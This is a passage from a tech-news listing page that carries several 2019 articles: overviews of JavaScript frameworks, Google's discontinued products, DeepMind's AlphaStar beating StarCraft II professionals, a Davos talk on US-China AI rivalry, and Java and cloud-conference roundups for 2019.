feel consistent with the apps you built using native languages. Under the hood, React Native translates your UI definition written in Javascript/JSX into a hierarchy of native views correct for the target platform. For example, if we are building an iOS app, it will translate the Text primitive to a native iOS UIView, and in Android, it will result with a native TextView. So, even though we are writing a JavaScript application, we do not get a web app embedded inside the shell of a mobile one. We are getting a “real native app”. NativeScript NativeScript was developed by Telerik (a subsidiary of Progress) and first released in 2014. It’s an open source framework that helps you build apps using JavaScript or any other language that transpiles to JavaScript, for example, TypeScript. It directly supports the Angular framework and supports the Vue framework via a community-developed plugin. Mobile applications built with NativeScript result in fully native apps, which use the same APIs as if they were developed in Xcode or Android Studio. Since the applications are built in JavaScript there is a need for some proxy mechanism to translate JavaScript code to the corresponding native APIs. This is done by the runtime parts of NativeScript, which act as a “bridge” between the JavaScript and the native world (Android and iOS). The runtimes facilitate calling APIs in the Android and iOS frameworks using JavaScript code. To do that JavaScript Virtual Machines are used – Google’s V8 for Android and WebKit’s JavaScriptCore implementation distributed with iOS 7.0+. Ionic Framework The Ionic framework was created by Drifty Co. and initially released in 2013. It is an open source, frontend SDK for developing hybrid mobile apps with familiar web technologies such as HTML5, CSS, and JavaScript. With Ionic, you will be able to build and deploy apps that work across multiple platforms, such as native iOS, Android, desktop, and the web as a Progressive Web App. Ionic is mainly focused on an application’s look and feel, or the UI interaction. This tells us that it’s not meant to replace Cordova or your favorite JavaScript framework. In fact, it still needs a native wrapper like Cordova to run your app as a mobile app. It uses these wrappers to gain access to host operating systems features such as Camera, GPS, Flashlight, etc. Ionic apps run in low-level browser shell like UIWebView in iOS or WebView in Android, which is wrapped by tools like Cordova/PhoneGap. JavaScript Desktop application development frameworks Electron Electron was created by Cheng Zao, a software engineer at GitHub. It was initially released in 2013 as Atom Shell and then was renamed to Electron in 2015. Electron enables web developers to use their existing knowledge and native developers to build one codebase and ship it for each platform separately. There are many popular apps that are build with Electron including Slack, Skype for Linux, Simplenote, and Visual Studio Code, among others. An Electron app consists of three components: Chromium web engine, a Node.js interpreter, and your application’s source code. The Chromium web engine is responsible for rendering the UI. The Node.js interpreter executes JavaScript and provides your app access to OS features that are not available to the Chromium engine such as filesystem access, networking, native desktop functions, etc. The application’s source code is usually a combination of JavaScript, HTML, and CSS. JavaScript Machine learning frameworks Tensorflow.js At the TensorFlow Dev Summit 2018, Google announced the JavaScript implementation of TensorFlow, their machine learning framework, called TensorFlow.js. It is the successor of deeplearn.js, which was released in August 2017, and is now named as TensorFlow.js Core. The team recently released Node.js bindings for TensorFlow, so now the same JavaScript code will work on both the browser and Node.js. Tensorflow.js consists of four layers, namely the WebGL API for GPU-supported numerical operations, the web browser for user interactions, and two APIs: Core and Layers. The low-level Core API corresponds to the former deeplearn.js library, which provides hardware-accelerated linear algebra operations and an eager API for automatic differentiation. The higher-level Layers API is used to build machine-learning models on top of Core. It also allow developers to import models previously trained in Python with Keras or TensorFlow SavedModels and use it for inference or transfer learning in the browser. Brain.js Brain.js is a library of neural network written in JavaScript, a continuation of the “brain” library, which can be used with Node.js or in the browser. It simplifies the process of creating and training a neural network by utilizing the ease-of-use of JavaScript and by limiting the API to just a few method calls and options. It comes with different types of networks for different tasks, which include a feedforward neural network with backpropagation, time step recurrent neural network, time step long short term memory neural network, among others. JavaScript augmented reality and virtual reality frameworks React 360 In 2017, Facebook and Oculus together introduced React VR, which was revamped and rebranded last year as React 360. This improved version simplifies UI layout in 3D space and is faster than React VR. Built on top of React, which we discussed earlier, React 360 is a JavaScript library that enables developers to create 3D and VR interfaces. It allows web developers to use familiar tools and concepts to create immersive 360 experiences on the web. An application built with React 360 consists of two pieces, namely, your React application and runtime, which turns your components into 3D elements on the screen. This “division of roles” concept is similar to React Native. As web browsers are single-threaded, the app code is separated from the rendering code to avoid any blocking behavior in the app. By running the app code in a separate context, the rendering loop is allowed to consistently update at a high frame rate. AR.js AR.js was developed by Jerome Etienne in 2017 with the aim of implementing augmented reality efficiently on the web. It currently gives efficiency of 60fps, which is not bad for an open source web-based solution. The library was inspired by projects like three.js, ARToolKit 5, emscripten and Chromium. AR.js requires WebGL, a 3D graphics API for the HTML5 Canvas element, and WebRTC, a set of browser APIs and protocols that allow for real-time communications of audio, video, and data in web browsers and native apps. Leveraging features in ARToolKit and A-Frame, AR.js makes the development of AR for the web a straightforward process that can be implemented by novice coders. New and emerging JavaScript frameworks Gatsby.js The creator of Gatsby, Kyle Mathews, quit his startup job in 2017 and started focusing full-time on his side projects: Gatsby.js and Typography.js. Gatsby.js was initially released in 2015 and its first version came out in 2017. It is a modern site generator for React.js, which means everything in Gatsby is built using components. With Gatsby, you can create both dynamic and static websites/web apps ranging from simple blogs, e-commerce websites to user dashboards. Gatsby supports many database sources such as Markdown files, a headless CMS like Contentful or WordPress, or a REST or GraphQL API, which you can consolidate via GraphQL. It also makes things like code splitting, image optimization, inlining critical styles, lazy-loading, and prefetching resources easier by automating them. Next.js Next.js was created by ZEIT and open sourced in 2016. Built on top of React, Webpack, and Babel, Next.js is a small JavaScript framework that enables an easy server-side rendering of React applications. It provides features like automatic code splitting, simple client-side routing, Webpack-based dev environment which supports HMR, and more. It aims to help developers write an isomorphic React application, so that the same rendering logic can be used for both client-side and server-side rendering. Next.js basically allows you to write a React app, with the SSR and things like code splitting being taken care of for you. It supports two server-side rendering modes: on demand and static export. On demand rendering means for each request, a unique page is rendered. This property is great for web apps that are highly dynamic, in which content changes often, have a login state, and similar use cases. This mode requires having a Node.js server running. While static export on other hand renders all pages to .html files up-front and serves them using any file server. This mode does not require a Node.js server running and the HTML can run anywhere. Nuxt.js Nuxt.js was originally created by the Chopin brothers, Alexandre and Sébastien Chopin and released in 2016. In January 2018, it was updated to a production-ready 1.0 version and is backed by an active and well-supported community. It is a higher-level framework inspired by Next.js, which builds on top of the Vue.js ecosystem and simplifies the development of universal or single page Vue.js applications. Under the hood, Nuxt.js uses webpack with vue-loader and babel-loader to bundle, code-split and minify your code. One of the perks of using Nuxt,js is that it provides a nuxt generate command, which generates a completely static version of your Vue application using the same codebase. In addition to that, it provides features for the development between the client side and the server side such as Asynchronous Data, Middleware, Layouts, etc. NestJS NestJS was created by Kamil Mysliwiec and released in 2017. It is a framework for effortlessly building efficient, reliable, and scalable Node.js server-side applications. It builds on top of TypeScript and JavaScript (ES6, ES7, ES8) and is heavily inspired by Angular as both use a Module/Component system that allows for reusability. Under the hood, NestJS uses Express, and is also compatible with a wide range of other libraries, for example, Fastify. For most of its abstractions, it uses classes and leverages the benefits of decorators and metadata reflection that classes and TypeScript bring. It comes with concepts like guards, pipes, and interceptors, and built-in support for other transports like WebSockets and gRPC. These were some of my picks from the plethora of JavaScript frameworks. You surely don't have to be an expert in all of them. Play with them, read the documentation, get an overview of their features. Before you start using a framework you can check it for few things such as the problems it solve, any other frameworks which do the same things better, if it aligns with your project requirement, which type of projects would this framework be ideal for, etc. If that framework appeals to you, maybe try to build a project with one. npm JavaScript predictions for 2019: React, GraphQL, and TypeScript are three technologies to learn 4 key findings from The State of JavaScript 2018 developer survey JavaScript mobile frameworks comparison: React Native vs Ionic vs NativeScript
Read more
  • 0
  • 0
  • 10541

article-image-why-google-kills-its-own-products
Sugandha Lahoti
25 Jan 2019
6 min read
Save for later

Why Google kills its own products

Sugandha Lahoti
25 Jan 2019
6 min read
The internet is abuzz with discussions of popular (and sometimes short-lived) Google products that the company has killed. The conversation has recently been kickstarted by Killed by Google, and Google Cemetry, which provided an ‘obituary’ of dead Google products and services last week. Google has always been enthusiastic about venturing into new fields. That’s one of the crucial reasons for its success. Taking risks on new products is inevitably going to produce a share of martyrs, but it’s the price you pay to establish new products. Most importantly, none of these ‘dead’ products have vanished completely. There always a strong alternative that Google is investing in. Many of these dead products are actually an important step towards something better and more successful. Those that do die, have either reached EOL (if hardware based) or are rebranded/merged with an existing product or split into a separate Alphabet company. But why does Google kill products? Dead products are really just a by-product of innovation. For Google to move quickly as a business - to compete with the likes of Amazon - it needs to try new things, and, by the same token, stop things when they’re not working out. While no one likes to fail, in Silicon Valley, failing fast has become a well-known philosophy. Dead products, that once seemed cutting-edge products lay the groundwork for better, more well-timed ideas that flourish later. Failure can lead to success - maybe even something world-changing. Like an experiment gone awry, they teach companies more about technology and how people want to use it. Google likes to ignore the market and see what surprises users Google’s strategy has always been to avoid getting hung up on paying less attention to market research. By doing market research a company tries to design and launch a product that fits with people’s expectations - in general, a good idea, especially if you can’t afford investing in something that’s a risk. Google, on the other hand, with the astonishing amount of capital at its disposal,  can almost skip this altogether. If they have a bright, smart idea, they just put it in the market for people to test and see. This was done with Google Tez, which was a mobile payments service by Google that was targeted at users in India. Since launching the app, over 55 million people have downloaded the app and more than 22 million people and businesses actively use the app for digital transactions every month. This was an instant signal to Google that the app may have done better if it was given a universally-accepted name. Tez was killed almost 3 months ago and rebranded to Google Pay. They now have a unified global payments services with what it had built for India.   Deceased Google products with a second life under a new brand name Here are a few more examples of what Google has demolished and subsequently rebranded: On September 16, 2014, it was announced that Google intended to close Panoramio and migrate it to Google Maps Views. Google News & Weather is a news aggregator application developed by Google. On May 8, 2018, Google announced that it was merging Google Play Newsstand and Google News & Weather into a single service, called Google News. Google Allo is an instant messaging mobile app by Google. It will be rebranded as Google Chat. It was killed 7 months ago. P Project Tango was an API for augmented reality apps that was killed and replaced by ARCore. Sometimes, poor products are the problem While some Google products simply needed better branding, there are plenty of examples of projects that were terminated simply because they weren’t good enough. This is often down to engineering mistakes (bugs) or a lack of user engagement. Google stated that the primary reason for retiring Picasa was that it wanted to focus its efforts “entirely on a single photos service” the cross-platform, web-based Google Photos. Over the past decade, the growth of Facebook, YouTube, Blogger, and Google+ have outpaced Orkut’s. Google decided to bid Orkut farewell and shut it down. On April 20, 2015, Google officially shut down Helpouts stating that the service hadn’t, “grown at the pace we had expected.” Most recently, In October 2018, Google announced that it was shutting down Google+ for consumers, citing low user engagement and a software error. Surprisingly, lists such as these have had the exact opposite effect than what was intended by the creators. People support Google for rebranding their projects. A hacker news user said, “This list actually had the opposite intended effect on me. Yeah, Google Reader should have stuck around. But half of these I've either never heard of or only faintly remember. And the ones I do remember seem like reasonable axes. Google Video, for example, seemed to serve the sole purpose of making me think "dammit, why doesn't the 'Video' tab just take me to YouTube?" So Google's huge and had to cut off some redundant services over the years. So what. In view of privacy violations, military tech collaborations, and so on, EOL-ing a couple dozen services is hardly a cardinal sin.” However, the downside of retiring products is that there will always be someone who is unhappy. Even if a product isn’t widely used, there will always be some people that like the product, maybe have even grown to love it. Like a breakfast radio show, people form habits around a product’s’ UI and overall experience. They become comfortable. Some people have argued that Google has killed stuff on a whim. Google Reader, url shortner, code search, Picasa, were all cited as examples of things that the company should not have shut down.   Here are some of the reactions of people on Hacker News. “Other day I was looking to buy a movie and it was available on Amazon as well as YouTube, I went to Amazon because YouTube feels much more likely to shut down it’s movie business on a whim while Amazon will likely fight out to last moment. Same goes for buying music.” “Even after 5+ years, I still miss Google Reader almost every day. Just pure simplicity and tight community around sharing are yet to be matched in my opinion. The web has moved on and as someone commented here, it’s walled garden everywhere now.” Read more of this conversation on Hacker News. Dead products can teach us a lot about the priorities of businesses, and maybe even something about the people that use them - people like us. Ultimately, however, dead products are the waste product of philosophy of growth: as business looks to expand into new markets, some products are probably going to get the chop. Read Next Google hints shutting down Google News over EU’s implementation of Article 11 or the “link tax” Google releases Magenta studio beta, an open source python machine learning library for music artists Day 1 of Chrome Dev Summit 2018: new announcements and Google’s initiative to close the gap between web and native
Read more
  • 0
  • 0
  • 5512

article-image-google-deepminds-ai-alphastar-beats-starcraft-ii-pros-tlo-and-mana-wins-10-1-against-the-gamers
Natasha Mathur
25 Jan 2019
5 min read
Save for later

Google DeepMind’s AI AlphaStar beats StarCraft II pros TLO and MaNa; wins 10-1 against the gamers

Natasha Mathur
25 Jan 2019
5 min read
It was two days back when the Blizzard team announced an update about the demo of the progress made by Google’s DeepMind AI at StarCraft II, a real-time strategy video game. The demo was presented yesterday over a live stream where it showed, AlphaStar, DeepMind’s StarCraft II AI program, beating the top two professional StarCraft II players, TLO and MaNa. The demo presented a series of five separate test matches that were held earlier on 19 December, against Team Liquid’s Grzegorz "MaNa" Komincz, and Dario “TLO” Wünsch. AlphaStar beat the two professional players, managing to score 10-0 in total (5-0 against each). After the 10 straight wins, AlphaStar finally got beaten by MaNa in a live match streamed by Blizzard and DeepMind. https://twitter.com/LiquidTLO/status/1088524496246657030 https://twitter.com/Liquid_MaNa/status/1088534975044087808 How does AlphaStar learn? AlphaStar learns by imitating the basic micro and macro-strategies used by players on the StarCraft ladder. A neural network was trained initially using supervised learning from anonymised human games released by Blizzard. This initial AI agent managed to defeat the “Elite” level AI in 95% of games. Once the agents get trained from human game replays, they’re then trained against other competitors in the “AlphaStar league”. This is where a multi-agent reinforcement learning process starts. New competitors are added to the league (branched from existing competitors). Each of these agents then learns from games against other competitors. This ensures that each competitor performs well against the strongest strategies, and does not forget how to defeat earlier ones.                                          AlphaStar As the league continues to progress, new counter-strategies emerge, that can defeat the earlier strategies. Also, each agent has its own learning objective which gets adapted during the training. One agent might have an objective to beat one specific competitor, while another one might want to beat a whole distribution of competitors. So, the neural network weights of each agent get updated using reinforcement learning, from its games against competitors. This helps optimise their personal learning objective. How does AlphaStar play the game? TLO and MaNa, professional StarCraft players, can issue hundreds of actions per minute (APM) on average. AlphaStar had an average APM of around 280 in its games against TLO and MaNa, which is significantly lower than the professional players. This is because AlphaStar starts its learning using replays and thereby mimics the way humans play the game. Moreover, AlphaStar also showed the delay between observation and action of 350ms on average.                                                    AlphaStar AlphaStar might have had a slight advantage over the human players as it interacted with the StarCraft game engine directly via its raw interface. What this means is that it could observe the attributes of its own as well as its opponent’s visible units on the map directly, basically getting a zoomed out view of the game. Human players, however, have to split their time and attention to decide where to focus the camera on the map. But, the analysis results of the game showed that the AI agents “switched context” about 30 times per minute, akin to MaNa or TLO. This proves that AlphaStar’s success against MaNa and TLO is due to its superior macro and micro-strategic decision-making. It isn’t the superior click-rate, faster reaction times, or the raw interface, that made the AI win. MaNa managed to beat AlphaStar in one match DeepMind also developed a second version of AlphaStar, which played like human players, meaning that it had to choose when and where to move the camera. Two new agents were trained, one that used the raw interface and the other that learned to control the camera, against the AlphaStar league.                                                           AlphaStar “The version of AlphaStar using the camera interface was almost as strong as the raw interface, exceeding 7000 MMR on our internal leaderboard”, states the DeepMind team. But, the team didn’t get the chance to test the AI against a human pro prior to the live stream.   In a live exhibition match, MaNa managed to defeat the new version of AlphaStar using the camera interface, which was trained for only 7 days. “We hope to evaluate a fully trained instance of the camera interface in the near future”, says the team. DeepMind team states AlphaStar’s performance was initially tested against TLO, where it won the match. “I was surprised by how strong the agent was..(it) takes well-known strategies..I hadn’t thought of before, which means there may still be new ways of playing the game that we haven’t fully explored yet,” said TLO. The agents were then trained for an extra one week, after which they played against MaNa. AlphaStar again won the game. “I was impressed to see AlphaStar pull off advanced moves and different strategies across almost every game, using a very human style of gameplay I wouldn’t have expected..this has put the game in a whole new light for me. We’re all excited to see what comes next,” said MaNa. Public reaction to the news is very positive, with people congratulating the DeepMind team for AlphaStar’s win: https://twitter.com/SebastienBubeck/status/1088524371285557248 https://twitter.com/KaiLashArul/status/1088534443718045696 https://twitter.com/fhuszar/status/1088534423786668042 https://twitter.com/panicsw1tched/status/1088524675540549635 https://twitter.com/Denver_sc2/status/1088525423229759489 To learn about the strategies developed by AlphaStar, check out the complete set of replays of AlphaStar's matches against TLO and MaNa on DeepMind's website. Best game engines for Artificial Intelligence game development Deepmind’s AlphaZero shows unprecedented growth in AI, masters 3 different games Deepmind’s AlphaFold is successful in predicting the 3D structure of a protein making major inroads for AI use in healthcare
Read more
  • 0
  • 0
  • 4993
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at ₹800/month. Cancel anytime
article-image-what-the-us-china-tech-and-ai-arms-race-means-for-the-world-frederick-kempe-at-davos-2019
Sugandha Lahoti
24 Jan 2019
6 min read
Save for later

What the US-China tech and AI arms race means for the world - Frederick Kempe at Davos 2019

Sugandha Lahoti
24 Jan 2019
6 min read
Atlantic Council CEO, Frederick Kempe spoke in the World Economic Forum (WEF) in Davos, Switzerland. He talked about the Cold war between the US and China and why the countries need to co-operate and not compete in the tech arms race, in his presentation Future Frontiers of Technology Control. He began his presentation by posing a question set forth by Former US Foreign National Security Advisor Stephen Hadley, “Can the incumbent US and insurgent China become strategic collaborators and strategic competitors in this tech space at the same time?” Read also: The New AI Cold War Between China and the USA Kempe’s three framing arguments Geopolitical Competition This fusion of tech breakthroughs blurring lines of the physical, digital, and biological space is reaching an inflection point that makes it already clear that they will usher in a revolution that will determine the shape of the global economy. It will also determine which nations and political constructs may assume the commanding heights of global politics in the coming decade. Technological superiority Over the course of history, societies that dominated economic innovation and progress have dominated in international relations — from military superiority to societal progress and prosperity. On balance, technological progress has contributed to higher standards of living in most parts of the world; however, the disproportionate benefit goes to first movers. Commanding Heights The technological arms race for supremacy in the fourth industrial revolution has essentially become a two-horse contest between the United States and China. We are in the early stages of this race, but how it unfolds and is conducted will do much to shape global human relations. The shift in 2018 in US-China relations from a period of strategic engagement to greater strategic competition has also significantly accelerated the Tech arms race. China vs the US: Why China has the edge? It was Vladimir Putin, President of the Russian Federation who said that “The one who becomes the leader in Artificial Intelligence, will rule the world.” In 2017, DeepMind’s AlphaGo defeated a Chinese master in Go, a traditional Chinese game. Following this defeat, China launched an ambitious roadmap, called the next generation AI plan. The goal was to become the Global leader in AI by 2030 in theory, technology, and application. On current trajectories, in the four primary areas of AI over the next 5 years, China will emerge the winner of this new technology race. Kempe also quotes, author of the book, AI superpowers, Kai-fu Lee who argues that harnessing of the power of AI today- the electricity of the 21st century- requires abundant data, hungry entrepreneurs, AI scientists, and an AI friendly policy. He believes that China has the edge in all of these. The current AI has translated from out of the box research, where the US has expertise in, to actual implementation, where China has the edge. Per, Kai-fu Lee China already has the edge in entrepreneurship, data, and government support, and is rapidly catching up to the U.S. in expertise. The world has translated from the age of world-leading expertise (US department) to the age of data, where China wins hands down. Economists call China the Saudi Arabia of Data and with that as the fuel for AI, it has an enormous advantage. The Chinese government without privacy restrictions can gain and use data in a manner that is out of reach of any democracy. Kemper concludes that the nature of this technological arms contest may favor insurgent China rather than the incumbent US. What are the societal implications of this tech cold war He also touched upon the societal implications of AI and the cold war between the US and China. A number of jobs will be lost by 2030. Quoting from Kai-fu Lee’s book, Kempe says that Job displacement caused by artificial intelligence and advanced robotics could possibly displace up to 54 million US workers which comprise 30% of the US labor force. It could also displace up to 100 million Chinese workers which are 12% of the Chinese labor force. What is the way forward with these huge societal implications of a bi-lateral race underway? Kempe sees three possibilities. A sloppy Status Quo A status quo where China and the US will continue to cooperate but increasingly view each other with suspicion. They will manage their rising differences and distrust imperfectly, never bridging them entirely, but also not burning bridges, either between researchers, cooperations, or others. Techno Cold War China and the US turn the global tech contest into more of a zero-sum battle for global domination. They organize themselves in a manner that separates their tech sectors from each other and ultimately divides up the world. Collaborative Future - the one we hope for Nicholas Thompson and Ian Bremmer argued in a wired interview that despite the two countries’ societal difference, the US should wrap China in a tech embrace. The two countries should work together to establish international standards to ensure that the algorithms governing people’s lives and livelihoods are transparent and accountable. They should recognize that while the geopolitics of technological change is significant, even more important will be the challenges AI poses to all societies across the world in terms of job automation and the social disruptions that may come with it. It may sound utopian to expect US and China to cooperate in this manner, but this is what we should hope for. To do otherwise would be self-defeating and at the cost of others in the global community which needs our best thinking to navigate the challenges of the fourth industrial revolution. Kempe concludes his presentation with a quote by Henry Kissinger, Former US Secretary of State and National Security Advisor, “We’re in a position in which the peace and prosperity of the world depend on whether China and the US can find a method to work together, not always in agreement, but to handle our disagreements...This is the key problem of our time.” Note: All images in this article are taken from Frederick Kempe’s presentation. We must change how we think about AI, urge AI founding fathers Does AI deserve to be so Overhyped? Alarming ways governments are using surveillance tech to watch you
Read more
  • 0
  • 0
  • 3382

article-image-7-things-java-programmers-need-to-watch-for-in-2019
Prasad Ramesh
24 Jan 2019
7 min read
Save for later

7 things Java programmers need to watch for in 2019

Prasad Ramesh
24 Jan 2019
7 min read
Java is one of the most popular and widely used programming languages in the world. Its dominance of the TIOBE index ranking is unmatched for the most part, holding the number 1 position for almost 20 years. Although Java’s dominance is unlikely to waver over the next 12 months, there are many important issues and announcements that will demand the attention of Java developers. So, get ready for 2019 with this list of key things in the Java world to watch out for. #1 Commercial Java SE users will now need a license Perhaps the most important change for Java in 2019 is that commercial users will have to pay a license fee to use Java SE from February. This move comes in as Oracle decided to change the support model for the Java language. This change currently affects Java SE 8 which is an LTS release with premier and extended support up to March 2022 and 2025 respectively. For individual users, however, the support and updates will continue till December 2020. The recently released Java SE 11 will also have long term support with five and extended eight-year support from the release date. #2 The Java 12 release in March 2019 Since Oracle changed their support model, non-LTS version releases will be bi-yearly and probably won’t contain many major changes. JDK 12 is non-LTS, that is not to say that the changes in it are trivial, it comes with its own set of new features. It will be generally available in March this year and supported until September which is when Java 13 will be released. Java 12 will have a couple of new features, some of them are approved to ship in its March release and some are under discussion. #3 Java 13 release slated for September 2019, with early access out now So far, there is very little information about Java 13. All we really know at the moment is that it’s’ due to be released in September 2019. Like Java 12, Java 13 will be a non-LTS release. However, if you want an early insight, there is an early access build available to test right now. Some of the JEP (JDK Enhancement Proposals) in the next section may be set to be featured in Java 13, but that’s just speculation. https://twitter.com/OpenJDK/status/1082200155854639104 #4 A bunch of new features in Java in 2019 Even though the major long term support version of Java, Java 11, was released last year, releases this year also have some new noteworthy features in store. Let’s take a look at what the two releases this year might have. Confirmed candidates for Java 12 A new low pause time compiler called Shenandoah is added to cause minimal interruption when a program is running. It is added to match modern computing resources. The pause time will be the same irrespective of the heap size which is achieved by reducing GC pause times. The Microbenchmark Suite feature will make it easier for developers to run existing testing benchmarks or create new ones. Revamped switch statements should help simplify the process of writing code. It essentially means the switch statement can also be used as an expression. The JVM Constants API will, the OpenJDK website explains, “introduce a new API to model nominal descriptions of key class-file and run-time artifacts”. Integrated with Java 12 is one AArch64 port, instead of two. Default CDS Archives. G1 mixed collections. Other features that may not be out with Java 12 Raw string literals will be added to Java. A Packaging Tool, designed to make it easier to install and run a self-contained Java application on a native platform. Limit Speculative Execution to help both developers and operations engineers more effectively secure applications against speculative-execution vulnerabilities. #5 More contributions and features with OpenJDK OpenJDK is an open source implementation of Java standard edition (Java SE) which has contributions from both Oracle and the open-source community. As of now, the binaries of OpenJDK are available for the newest LTS release, Java 11. Even the life cycles of OpenJDK 7 and 8 have been extended to June 2020 and 2023 respectively. This suggests that Oracle does seem to be interested in the idea of open source and community participation. And why would it not be? Many valuable contributions come from the open source community. Microsoft seems to have benefitted from open sourcing with the incoming submissions. Although Oracle will not support these versions after six months from initial release, Red Hat will be extending support. As the chief architect of the Java platform, Mark Reinhold said stewards are the true leaders who can shape what Java should be as a language. These stewards can propose new JEPs, bring new OpenJDK problems to notice leading to more JEPs and contribute to the language overall. #6 Mobile and machine learning job opportunities In the mobile ecosystem, especially Android, Java is still the most widely used language. Yes, there’s Kotlin, but it is still relatively new. Many developers are yet to adopt the new language. According to an estimated by Indeed, the average salary of a Java developer is about $100K in the U.S. With the Android ecosystem growing rapidly over the last decade, it’s not hard to see what’s driving Java’s value. But Java - and the broader Java ecosystem - are about much more than mobile. Although Java’s importance in enterprise application development is well known, it's also used in machine learning and artificial intelligence. Even if Python is arguably the most used language in this area, Java does have its own set of libraries and is used a lot in enterprise environments. Deeplearning4j, Neuroph, Weka, OpenNLP, RapidMiner, RL4J etc are some of the popular Java libraries in artificial intelligence. #7 Java conferences in 2019 Now that we’ve talked about the language, possible releases and new features let’s take a look at the conferences that are going to take place in 2019. Conferences are a good medium to hear top professionals present, speak, and programmers to socialize. Even if you can’t attend, they are important fixtures in the calendar for anyone interested in following releases and debates in Java. Here are some of the major Java conferences in 2019 worth checking out: JAX is a Java architecture and software innovation conference. To be held in Mainz, Germany happening May 6–10 this year, the Expo is from May 7 to 9. Other than Java, topics like agile, Cloud, Kubernetes, DevOps, microservices and machine learning are also a part of this event. They’re offering discounts on passes till February 14. JBCNConf is happening in Barcelona, Spain from May 27. It will be a three-day conference with talks from notable Java champions. The focus of the conference is on Java, JVM, and open-source technologies. Jfokus is a developer-centric conference taking place in Stockholm, Sweden. It will be a three-day event from February 4-6. Speakers include the Java language architect, Brian Goetz from Oracle and many other notable experts. The conference will include Java, of course, Frontend & Web, cloud and DevOps, IoT and AI, and future trends. One of the biggest conferences is JavaZone attracting thousands of visitors and hundreds of speakers will be 18 years old this year. Usually held in Oslo, Norway in the month of September. Their website for 2019 is not active at the time of writing, you can check out last year’s website. Javaland will feature lectures, training, and community activities. Held in Bruehl, Germany from March 19 to 21 attendees can also exhibit at this conference. If you’re working in or around Java this year, there’s clearly a lot to look forward to - as well as a few unanswered questions about the evolution of the language in the future. While these changes might not impact the way you work in the immediate term, keeping on top of what’s happening and what key figures are saying will set you up nicely for the future. 4 key findings from The State of JavaScript 2018 developer survey Netflix adopts Spring Boot as its core Java framework Java 11 is here with TLS 1.3, Unicode 11, and more updates
Read more
  • 0
  • 0
  • 7772

article-image-the-10-best-cloud-and-infrastructure-conferences-happening-in-2019
Sugandha Lahoti
23 Jan 2019
11 min read
Save for later

The 10 best cloud and infrastructure conferences happening in 2019

Sugandha Lahoti
23 Jan 2019
11 min read
The latest Gartner report suggests that the cloud market is going to grow an astonishing 17.3% ($206 billion) in 2019, up from $175.8 billion in 2018. By 2022, the report claims, 90% of organizations will be using cloud services. But the cloud isn’t one thing, and 2019 is likely to bring the diversity of solutions, from hybrid to multi-cloud, to serverless, to the fore. With such a mix of opportunities and emerging trends, it’s going to be essential to keep a close eye on key cloud computing and software infrastructure conferences throughout the year. These are the events where we’ll hear the most important announcements, and they’ll probably also be the place where the most important conversations happen too. But with so many cloud computing conferences dotted throughout the year, it’s hard to know where to focus your attention. For that very reason, we’ve put together a list of some of the best cloud computing conferences taking place in 2019. #1 Google Cloud Next When and where is Google Cloud Next 2019 happening? April 9-11 at the Moscone Center in San Francisco. What is it? This is Google’s annual global conference focusing on the company’s cloud services and products, namely Google Cloud Platform. At previous events, Google has announced enterprise products such as G Suite and Developer Tools. The three-day conference features demonstrations, keynotes, announcements, conversations, and boot camps. What’s happening at Google Cloud Next 2019? This year Google Cloud Next has more than 450 sessions scheduled. You can also meet directly with Google experts in artificial intelligence and machine learning, security, and software infrastructure. Themes covered this year include application development, architecture, collaboration, and productivity, compute, cost management, DevOps and SRE, hybrid cloud, and serverless. The conference may also serve as a debut platform for new Google Cloud CEO Thomas Kurian. Who’s it for? The event is a not-to-miss event for IT professionals and engineers, but it will also likely attract entrepreneurs. For those of us who won’t attend, Google Cloud Next will certainly be one of the most important conferences to follow. Early bird registration begins from March 1 for $999. #2 OpenStack Infrastructure Summit When and where is OpenStack Infrastructure Summit 2019 happening? April 29 - May 1 in Denver. What is it? The OpenStack Infrastructure Summit, previously the OpenStack Summit, is focused on open infrastructure integration and has evolved over the years to cover more than 30 different open source projects.  The event is structured around use cases, training, and related open source projects. The summit also conducts Project Teams Gathering, just after the main conference (this year May 2-4). PTG provides meeting facilities, allowing various technical teams contributing to OSF (Open Science Framework) projects to meet in person, exchange ideas and get work done in a productive setting. What’s happening at this year’s OpenStack Infrastructure Summit? This year the summit is expected to have almost 300 sessions and workshops on Container Infrastructure, CI/CD, Telecom + NFV, Public Cloud, Private & Hybrid Cloud, Security etc. The Summit is going to have members of open source communities like Airship, Ansible, Ceph, Docker, Kata Containers, Kubernetes, ONAP, OpenStack, Open vSwitch, OPNFV, StarlingX, Zuul among other topics. Who’s it for? This is an event for engineers working in operations and administration. If you’re interested in OpenStack and how the foundation fits into the modern cloud landscape there will certainly be something here for you. #3 DockerCon When and where is DockerCon 2019 happening? April 29 to May 2 at Moscone West, San Francisco. What is it? DockerCon is perhaps the container event of the year. The focus is on what’s happening across the Docker world, but it will offer plenty of opportunities to explore the ways Docker is interacting and evolving with a wider ecosystem of tools. What’s happening at DockerCon 2019? This three-day conference will feature networking opportunities and hands-on labs. It will also hold an exposition where innovators will showcase their latest products. It’s expected to have over 6,000 attendees with 5+ tracks and 100 sessions. You’ll also have the opportunity to become a Docker Certified Associate with an on-venue test. Who’s it for? The event is essential for anyone working in and around containers - so DevOps, SRE, administration and infrastructure engineers. Of course, with Docker finding its way into the toolsets of a variety of roles, it may be useful for people who want to understand how Docker might change the way they work in the future.  Pricing for DockerCon runs from around $1080 for early-bird reservations to $1350 for standard tickets. #4 Red Hat Summit When and where is Red Hat Summit 2019 happening? May 7–9 in Boston. What is it? Red Hat Summit is an open source technology event run by Red Hat. It covers a wide range of topics and issues, essentially providing a snapshot of where the open source world is at the moment and where it might be going. With open source shaping cloud and other related trends, it’s easy to see why the event could be important for anyone with an interest in cloud and infrastructure. What’s happening at Red Hat Summit 2019? The theme for this year is AND. The copy on the event’s website reads:  AND is about scaling your technology and culture in whatever size or direction you need, when you need to, with what you actually need―not a bunch of bulky add-ons. From the right foundation―an open foundation―AND adapts with you. It’s interoperable, adjustable, elastic. Think Linux AND Containers. Think public AND private cloud. Think Red Hat AND you. There’s clearly an interesting conceptual proposition at the center of this year’s event that hints at how Red Hat wants to get engineers and technology buyers to think about the tools they use and how they use them. Who’s it for? The event is big for any admin or engineer that works with open source technology - Linux in particular (so, quite a lot of people…). Given Red Hat was bought by IBM just a few months ago in 2018, this event will certainly be worth watching for anyone interested in the evolution of both companies as well as open source software more broadly. #5 KubeCon + CloudNativeCon Europe When and where is KubeCon + CloudNativeCon Europe 2019? May 20 to 23 at Fira Barcelona. What is it? KubeCon + CloudNativeCon is CCNF’s (Cloud Native Computing Foundation) flagship conference for open source and cloud-native communities. It features contributors from cloud-native applications and computing, containers, 